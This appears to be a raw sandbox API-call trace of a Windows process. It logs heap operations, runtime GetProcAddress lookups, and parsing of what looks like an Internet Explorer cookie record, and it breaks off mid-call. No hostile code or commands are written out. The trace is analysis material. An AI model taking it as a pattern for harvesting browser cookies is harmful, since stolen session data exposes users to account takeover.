[0181.393] GetProcessHeap () returned 0x5f0000 [0181.393] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xc) returned 0x61f690 [0181.393] GetProcAddress (hModule=0x7ffb26230000, lpProcName="HeapReAlloc") returned 0x7ffb28b239f0 [0181.393] GetProcessHeap () returned 0x5f0000 [0181.393] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f690 | out: hHeap=0x5f0000) returned 1 [0181.393] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x61f5d0, Size=0x1) returned 0x61f780 [0181.393] GetProcessHeap () returned 0x5f0000 [0181.393] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x6) returned 0x61f5d0 [0181.393] GetProcessHeap () returned 0x5f0000 [0181.393] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xf) returned 0x61f7c0 [0181.393] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcessHeap") returned 0x7ffb2624d4f0 [0181.393] GetProcessHeap () returned 0x5f0000 [0181.393] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f7c0 | out: hHeap=0x5f0000) returned 1 [0181.393] GetProcessHeap () returned 0x5f0000 [0181.394] GetProcessHeap () returned 0x5f0000 [0181.394] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xc) returned 0x61f750 [0181.394] GetProcAddress (hModule=0x7ffb26230000, lpProcName="HeapReAlloc") returned 0x7ffb28b239f0 [0181.394] GetProcessHeap () returned 0x5f0000 [0181.394] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f750 | out: hHeap=0x5f0000) returned 1 [0181.394] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x61f5d0, Size=0x5) returned 0x61f730 [0181.394] lstrlenA (lpString="IE") returned 2 [0181.394] GetProcessHeap () returned 0x5f0000 [0181.394] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x3) returned 0x61f5d0 [0181.394] lstrcpyA (in: lpString1=0x61f5d0, lpString2="IE" | out: lpString1="IE") returned="IE" [0181.394] GetProcessHeap () returned 0x5f0000 [0181.394] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x12) returned 0x636280 [0181.394] GetProcessHeap () returned 0x5f0000 [0181.394] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xf) returned 0x61f860 [0181.394] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcessHeap") returned 0x7ffb2624d4f0 [0181.394] GetProcessHeap () returned 0x5f0000 [0181.394] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f860 | out: hHeap=0x5f0000) returned 1 [0181.394] GetProcessHeap () returned 0x5f0000 [0181.394] GetProcessHeap () returned 0x5f0000 [0181.394] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xc) returned 0x61f6b0 [0181.394] GetProcAddress (hModule=0x7ffb26230000, lpProcName="HeapReAlloc") returned 0x7ffb28b239f0 [0181.394] GetProcessHeap () returned 0x5f0000 [0181.394] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f6b0 | out: hHeap=0x5f0000) returned 1 [0181.394] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x636280, Size=0x11) returned 0x636140 [0181.394] GetProcessHeap () returned 0x5f0000 [0181.394] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x11) returned 0x6363a0 [0181.394] GetProcessHeap () returned 0x5f0000 [0181.394] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x6363a0, Size=0x23) returned 0x6136b0 [0181.395] GetProcessHeap () returned 0x5f0000 [0181.395] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x12) returned 0x636440 [0181.395] GetProcessHeap () returned 0x5f0000 [0181.395] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x636440, Size=0x27) returned 0x613ad0 [0181.395] GetProcessHeap () returned 0x5f0000 [0181.395] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x14) returned 0x636080 [0181.395] GetProcessHeap () returned 0x5f0000 [0181.395] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x636080, Size=0x29) returned 0x613950 [0181.395] GetProcessHeap () returned 0x5f0000 [0181.395] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x15) returned 0x636080 [0181.395] GetProcessHeap () returned 0x5f0000 [0181.395] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x636080, Size=0x31) returned 0x6355d0 [0181.395] GetProcessHeap () returned 0x5f0000 [0181.395] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x19) returned 0x6362a0 [0181.395] GetProcessHeap () returned 0x5f0000 [0181.395] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x6362a0, Size=0x33) returned 0x635410 [0181.395] GetProcessHeap () returned 0x5f0000 [0181.395] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x1a) returned 0x636220 [0181.395] GetProcessHeap () returned 0x5f0000 [0181.395] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x1a) returned 0x636100 [0181.395] GetProcessHeap () returned 0x5f0000 [0181.395] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x636100, Size=0x35) returned 0x635150 [0181.395] GetProcessHeap () returned 0x5f0000 [0181.395] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x1b) returned 0x6363a0 [0181.395] GetProcessHeap () returned 0x5f0000 [0181.395] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x6363a0, Size=0x4d) returned 0x6201e0 [0181.395] GetProcessHeap () returned 0x5f0000 [0181.395] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x27) returned 0x613800 [0181.395] GetProcessHeap () returned 0x5f0000 [0181.395] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x613800, Size=0x4f) returned 0x620410 [0181.395] GetProcessHeap () returned 0x5f0000 [0181.395] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x28) returned 0x613800 [0181.395] GetProcessHeap () returned 0x5f0000 [0181.395] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x613800, Size=0x63) returned 0x611f60 [0181.395] GetProcessHeap () returned 0x5f0000 [0181.396] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x32) returned 0x6351d0 [0181.396] GetProcessHeap () returned 0x5f0000 [0181.396] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x6351d0, Size=0x65) returned 0x625ca0 [0181.396] GetProcessHeap () returned 0x5f0000 [0181.396] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x33) returned 0x635550 [0181.396] GetProcessHeap () returned 0x5f0000 [0181.396] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x635550, Size=0x79) returned 0x625d20 [0181.396] GetProcessHeap () returned 0x5f0000 [0181.396] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x3d) returned 0x635290 [0181.396] GetProcessHeap () returned 0x5f0000 [0181.396] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x635290, Size=0x7b) returned 0x625db0 [0181.396] GetProcessHeap () returned 0x5f0000 [0181.396] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x3e) returned 0x635550 [0181.396] GetProcessHeap () returned 0x5f0000 [0181.396] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x3e) returned 0x635590 [0181.396] GetProcessHeap () returned 0x5f0000 [0181.396] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x635590, Size=0x7f) returned 0x625040 [0181.396] GetProcessHeap () returned 0x5f0000 [0181.396] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x622340, Size=0x179) returned 0x6250d0 [0181.396] GetProcessHeap () returned 0x5f0000 [0181.396] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x625040 | out: hHeap=0x5f0000) returned 1 [0181.396] GetProcessHeap () returned 0x5f0000 [0181.396] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x635550 | out: hHeap=0x5f0000) returned 1 [0181.396] GetProcessHeap () returned 0x5f0000 [0181.396] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x625db0 | out: hHeap=0x5f0000) returned 1 [0181.396] GetProcessHeap () returned 0x5f0000 [0181.396] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x625d20 | out: hHeap=0x5f0000) returned 1 [0181.396] GetProcessHeap () returned 0x5f0000 [0181.396] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x625ca0 | out: hHeap=0x5f0000) returned 1 [0181.396] GetProcessHeap () returned 0x5f0000 [0181.396] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x611f60 | out: hHeap=0x5f0000) returned 1 [0181.396] GetProcessHeap () returned 0x5f0000 [0181.396] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x620410 | out: hHeap=0x5f0000) returned 1 [0181.396] GetProcessHeap () returned 0x5f0000 [0181.396] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x6201e0 | out: hHeap=0x5f0000) returned 1 [0181.396] GetProcessHeap () returned 0x5f0000 [0181.396] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x635150 | out: hHeap=0x5f0000) returned 1 [0181.396] GetProcessHeap () returned 0x5f0000 [0181.396] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x636220 | out: hHeap=0x5f0000) returned 1 [0181.397] GetProcessHeap () returned 0x5f0000 [0181.397] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x635410 | out: hHeap=0x5f0000) returned 1 [0181.397] GetProcessHeap () returned 0x5f0000 [0181.397] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x6355d0 | out: hHeap=0x5f0000) returned 1 [0181.397] GetProcessHeap () returned 0x5f0000 [0181.397] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x613950 | out: hHeap=0x5f0000) returned 1 [0181.397] GetProcessHeap () returned 0x5f0000 [0181.397] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x613ad0 | out: hHeap=0x5f0000) returned 1 [0181.397] GetProcessHeap () returned 0x5f0000 [0181.397] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x6136b0 | out: hHeap=0x5f0000) returned 1 [0181.397] GetProcessHeap () returned 0x5f0000 [0181.397] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x636140 | out: hHeap=0x5f0000) returned 1 [0181.397] GetProcessHeap () returned 0x5f0000 [0181.397] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f5d0 | out: hHeap=0x5f0000) returned 1 [0181.397] GetProcessHeap () returned 0x5f0000 [0181.397] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f730 | out: hHeap=0x5f0000) returned 1 [0181.397] GetProcessHeap () returned 0x5f0000 [0181.397] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f780 | out: hHeap=0x5f0000) returned 1 [0181.397] GetProcessHeap () returned 0x5f0000 [0181.397] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f5c0 | out: hHeap=0x5f0000) returned 1 [0181.397] GetProcessHeap () returned 0x5f0000 [0181.397] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f490 | out: hHeap=0x5f0000) returned 1 [0181.397] GetProcessHeap () returned 0x5f0000 [0181.397] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f640 | out: hHeap=0x5f0000) returned 1 [0181.397] GetProcessHeap () returned 0x5f0000 [0181.397] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f5b0 | out: hHeap=0x5f0000) returned 1 [0181.397] GetProcessHeap () returned 0x5f0000 [0181.397] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f630 | out: hHeap=0x5f0000) returned 1 [0181.397] GetProcessHeap () returned 0x5f0000 [0181.397] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f550 | out: hHeap=0x5f0000) returned 1 [0181.397] GetProcessHeap () returned 0x5f0000 [0181.397] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f560 | out: hHeap=0x5f0000) returned 1 [0181.397] GetProcessHeap () returned 0x5f0000 [0181.397] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f5a0 | out: hHeap=0x5f0000) returned 1 [0181.397] GetProcessHeap () returned 0x5f0000 [0181.397] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f670 | out: hHeap=0x5f0000) returned 1 [0181.397] GetProcessHeap () returned 0x5f0000 [0181.398] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f540 | out: hHeap=0x5f0000) returned 1 [0181.398] GetProcessHeap () returned 0x5f0000 [0181.398] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f620 | out: hHeap=0x5f0000) returned 1 [0181.398] GetProcessHeap () returned 0x5f0000 [0181.398] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f530 | out: hHeap=0x5f0000) returned 1 [0181.398] GetProcessHeap () returned 0x5f0000 [0181.398] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f590 | out: hHeap=0x5f0000) returned 1 [0181.398] GetProcessHeap () returned 0x5f0000 [0181.398] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f580 | out: hHeap=0x5f0000) returned 1 [0181.398] GetProcessHeap () returned 0x5f0000 [0181.398] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f600 | out: hHeap=0x5f0000) returned 1 [0181.398] GetProcessHeap () returned 0x5f0000 [0181.398] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f520 | out: hHeap=0x5f0000) returned 1 [0181.398] GetProcessHeap () returned 0x5f0000 [0181.398] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f480 | out: hHeap=0x5f0000) returned 1 [0181.398] GetProcessHeap () returned 0x5f0000 [0181.398] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f660 | out: hHeap=0x5f0000) returned 1 [0181.398] GetProcessHeap () returned 0x5f0000 [0181.398] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f510 | out: hHeap=0x5f0000) returned 1 [0181.398] GetProcessHeap () returned 0x5f0000 [0181.398] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f4a0 | out: hHeap=0x5f0000) returned 1 [0181.398] GetProcessHeap () returned 0x5f0000 [0181.398] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x613aa0 | out: hHeap=0x5f0000) returned 1 [0181.398] GetProcessHeap () returned 0x5f0000 [0181.398] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x620140 | out: hHeap=0x5f0000) returned 1 [0181.398] lstrlenA (lpString="\n") returned 1 [0181.398] GetProcessHeap () returned 0x5f0000 [0181.398] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x2) returned 0x61f660 [0181.398] lstrcpyA (in: lpString1=0x61f660, lpString2="\n" | out: lpString1="\n") returned="\n" [0181.398] lstrlenA (lpString="\nSRCHD\nAF=NOFORM\nmicrosoft.com/\n1024\n1820274944\n30991936\n3472612970\n30913481\n") returned 77 [0181.398] GetProcessHeap () returned 0x5f0000 [0181.398] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x4e) returned 0x620820 [0181.398] lstrcpyA (in: lpString1=0x620820, lpString2="\nSRCHD\nAF=NOFORM\nmicrosoft.com/\n1024\n1820274944\n30991936\n3472612970\n30913481\n" | out: lpString1="\nSRCHD\nAF=NOFORM\nmicrosoft.com/\n1024\n1820274944\n30991936\n3472612970\n30913481\n") returned="\nSRCHD\nAF=NOFORM\nmicrosoft.com/\n1024\n1820274944\n30991936\n3472612970\n30913481\n" [0181.398] GetProcessHeap () returned 0x5f0000 [0181.398] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x1) returned 0x61f600 [0181.398] GetProcessHeap () returned 0x5f0000 [0181.398] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x1) returned 0x61f510 [0181.398] GetProcessHeap () returned 0x5f0000 [0181.398] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xf) returned 0x61f580 [0181.399] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcessHeap") returned 0x7ffb2624d4f0 [0181.399] GetProcessHeap () returned 0x5f0000 [0181.399] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f580 | out: hHeap=0x5f0000) returned 1 [0181.399] GetProcessHeap () returned 0x5f0000 [0181.399] GetProcessHeap () returned 0x5f0000 [0181.399] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xc) returned 0x61f580 [0181.399] GetProcAddress (hModule=0x7ffb26230000, lpProcName="HeapReAlloc") returned 0x7ffb28b239f0 [0181.399] GetProcessHeap () returned 0x5f0000 [0181.399] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f580 | out: hHeap=0x5f0000) returned 1 [0181.399] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x61f510, Size=0x5) returned 0x61f670 [0181.399] GetProcessHeap () returned 0x5f0000 [0181.399] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x61f600, Size=0x4e) returned 0x6201e0 [0181.399] GetProcessHeap () returned 0x5f0000 [0181.399] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xf) returned 0x61f580 [0181.399] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcessHeap") returned 0x7ffb2624d4f0 [0181.399] GetProcessHeap () returned 0x5f0000 [0181.399] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f580 | out: hHeap=0x5f0000) returned 1 [0181.399] GetProcessHeap () returned 0x5f0000 [0181.399] GetProcessHeap () returned 0x5f0000 [0181.399] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xc) returned 0x61f5b0 [0181.399] GetProcAddress (hModule=0x7ffb26230000, lpProcName="HeapReAlloc") returned 0x7ffb28b239f0 [0181.399] GetProcessHeap () returned 0x5f0000 [0181.399] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f5b0 | out: hHeap=0x5f0000) returned 1 [0181.399] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x61f670, Size=0x9) returned 0x61f480 [0181.399] GetProcessHeap () returned 0x5f0000 [0181.400] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xf) returned 0x61f540 [0181.400] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcessHeap") returned 0x7ffb2624d4f0 [0181.400] GetProcessHeap () returned 0x5f0000 [0181.400] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f540 | out: hHeap=0x5f0000) returned 1 [0181.400] GetProcessHeap () returned 0x5f0000 [0181.400] GetProcessHeap () returned 0x5f0000 [0181.400] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xc) returned 0x61f5d0 [0181.400] GetProcAddress (hModule=0x7ffb26230000, lpProcName="HeapReAlloc") returned 0x7ffb28b239f0 [0181.400] GetProcessHeap () returned 0x5f0000 [0181.400] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f5d0 | out: hHeap=0x5f0000) returned 1 [0181.400] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x61f480, Size=0x11) returned 0x636420 [0181.400] GetProcessHeap () returned 0x5f0000 [0181.400] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xf) returned 0x61f5d0 [0181.400] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcessHeap") returned 0x7ffb2624d4f0 [0181.400] GetProcessHeap () returned 0x5f0000 [0181.400] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f5d0 | out: hHeap=0x5f0000) returned 1 [0181.400] GetProcessHeap () returned 0x5f0000 [0181.400] GetProcessHeap () returned 0x5f0000 [0181.400] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xc) returned 0x61f5a0 [0181.400] GetProcAddress (hModule=0x7ffb26230000, lpProcName="HeapReAlloc") returned 0x7ffb28b239f0 [0181.400] GetProcessHeap () returned 0x5f0000 [0181.400] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f5a0 | out: hHeap=0x5f0000) returned 1 [0181.400] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x636420, Size=0x21) returned 0x613920 [0181.400] GetProcessHeap () returned 0x5f0000 [0181.400] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xf) returned 0x61f4a0 [0181.401] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcessHeap") returned 0x7ffb2624d4f0 [0181.401] GetProcessHeap () returned 0x5f0000 [0181.401] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f4a0 | out: hHeap=0x5f0000) returned 1 [0181.401] GetProcessHeap () returned 0x5f0000 [0181.401] GetProcessHeap () returned 0x5f0000 [0181.401] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xc) returned 0x61f600 [0181.401] GetProcAddress (hModule=0x7ffb26230000, lpProcName="HeapReAlloc") returned 0x7ffb28b239f0 [0181.401] GetProcessHeap () returned 0x5f0000 [0181.401] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f600 | out: hHeap=0x5f0000) returned 1 [0181.401] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x613920, Size=0x41) returned 0x620370 [0181.401] GetProcessHeap () returned 0x5f0000 [0181.401] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xf) returned 0x61f510 [0181.401] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcessHeap") returned 0x7ffb2624d4f0 [0181.401] GetProcessHeap () returned 0x5f0000 [0181.401] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f510 | out: hHeap=0x5f0000) returned 1 [0181.401] GetProcessHeap () returned 0x5f0000 [0181.401] GetProcessHeap () returned 0x5f0000 [0181.401] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xc) returned 0x61f580 [0181.401] GetProcAddress (hModule=0x7ffb26230000, lpProcName="HeapReAlloc") returned 0x7ffb28b239f0 [0181.401] GetProcessHeap () returned 0x5f0000 [0181.401] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f580 | out: hHeap=0x5f0000) returned 1 [0181.401] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x620370, Size=0x29) returned 0x613ad0 [0181.401] GetProcessHeap () returned 0x5f0000 [0181.401] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f660 | out: hHeap=0x5f0000) returned 1 [0181.401] GetProcessHeap () returned 0x5f0000 [0181.401] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x620820 | out: hHeap=0x5f0000) returned 1 [0181.401] lstrlenA (lpString="/") returned 1 [0181.401] GetProcessHeap () returned 0x5f0000 [0181.401] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x2) returned 0x61f510 [0181.402] lstrcpyA (in: lpString1=0x61f510, lpString2="/" | out: lpString1="/") returned="/" [0181.402] lstrlenA (lpString="AF=NOFORM") returned 9 [0181.402] GetProcessHeap () returned 0x5f0000 [0181.402] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xa) returned 0x61f520 [0181.402] lstrcpyA (in: lpString1=0x61f520, lpString2="AF=NOFORM" | out: lpString1="AF=NOFORM") returned="AF=NOFORM" [0181.402] lstrlenA (lpString="AF=NOFORM") returned 9 [0181.402] GetProcessHeap () returned 0x5f0000 [0181.402] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xa) returned 0x61f5d0 [0181.402] lstrcpyA (in: lpString1=0x61f5d0, lpString2="AF=NOFORM" | out: lpString1="AF=NOFORM") returned="AF=NOFORM" [0181.402] GetProcessHeap () returned 0x5f0000 [0181.402] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xa) returned 0x61f530 [0181.402] GetProcessHeap () returned 0x5f0000 [0181.402] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xa) returned 0x61f620 [0181.402] GetProcessHeap () returned 0x5f0000 [0181.402] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f530 | out: hHeap=0x5f0000) returned 1 [0181.402] GetProcessHeap () returned 0x5f0000 [0181.402] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f5d0 | out: hHeap=0x5f0000) returned 1 [0181.402] GetProcessHeap () returned 0x5f0000 [0181.402] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f520 | out: hHeap=0x5f0000) returned 1 [0181.402] GetProcessHeap () returned 0x5f0000 [0181.402] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f510 | out: hHeap=0x5f0000) returned 1 [0181.402] lstrlenA (lpString="AF=NOFORM") returned 9 [0181.402] GetProcessHeap () returned 0x5f0000 [0181.402] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xa) returned 0x61f5c0 [0181.402] lstrcpyA (in: lpString1=0x61f5c0, lpString2="AF=NOFORM" | out: lpString1="AF=NOFORM") returned="AF=NOFORM" [0181.402] lstrlenA (lpString="") returned 0 [0181.402] GetProcessHeap () returned 0x5f0000 [0181.402] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x1) returned 0x61f510 [0181.402] lstrcpyA (in: lpString1=0x61f510, lpString2="" | out: lpString1="") returned="" [0181.402] GetProcessHeap () returned 0x5f0000 [0181.402] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f5c0 | out: hHeap=0x5f0000) returned 1 [0181.402] lstrlenA (lpString="\r\n") returned 2 [0181.402] GetProcessHeap () returned 0x5f0000 [0181.402] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x3) returned 0x61f5c0 [0181.402] lstrcpyA (in: lpString1=0x61f5c0, lpString2="\r\n" | out: lpString1="\r\n") returned="\r\n" [0181.402] GetProcessHeap () returned 0x5f0000 [0181.402] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f5c0 | out: hHeap=0x5f0000) returned 1 [0181.402] lstrlenA (lpString="||") returned 2 [0181.402] GetProcessHeap () returned 0x5f0000 [0181.403] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x3) returned 0x61f560 [0181.403] lstrcpyA (in: lpString1=0x61f560, lpString2="||" | out: lpString1="||") returned="||" [0181.403] lstrlenA (lpString="|") returned 1 [0181.403] GetProcessHeap () returned 0x5f0000 [0181.403] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x2) returned 0x61f660 [0181.403] lstrcpyA (in: lpString1=0x61f660, lpString2="|" | out: lpString1="|") returned="|" [0181.403] lstrlenA (lpString="1024") returned 4 [0181.403] GetProcessHeap () returned 0x5f0000 [0181.403] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x5) returned 0x61f670 [0181.403] lstrcpyA (in: lpString1=0x61f670, lpString2="1024" | out: lpString1="1024") returned="1024" [0181.403] GetProcessHeap () returned 0x5f0000 [0181.403] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xe) returned 0x61f600 [0181.403] GetProcAddress (hModule=0x7ffb262e0000, lpProcName="StrToInt64ExA") returned 0x7ffb262f5ce0 [0181.403] GetProcessHeap () returned 0x5f0000 [0181.403] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f600 | out: hHeap=0x5f0000) returned 1 [0181.403] StrToInt64ExA (in: pszString="1024", dwFlags=0x0, pllRet=0x5cf680 | out: pllRet=0x5cf680) returned 1 [0181.403] lstrlenA (lpString="1820274944") returned 10 [0181.403] GetProcessHeap () returned 0x5f0000 [0181.403] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xb) returned 0x61f520 [0181.403] lstrcpyA (in: lpString1=0x61f520, lpString2="1820274944" | out: lpString1="1820274944") returned="1820274944" [0181.403] GetProcessHeap () returned 0x5f0000 [0181.403] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xe) returned 0x61f580 [0181.403] GetProcAddress 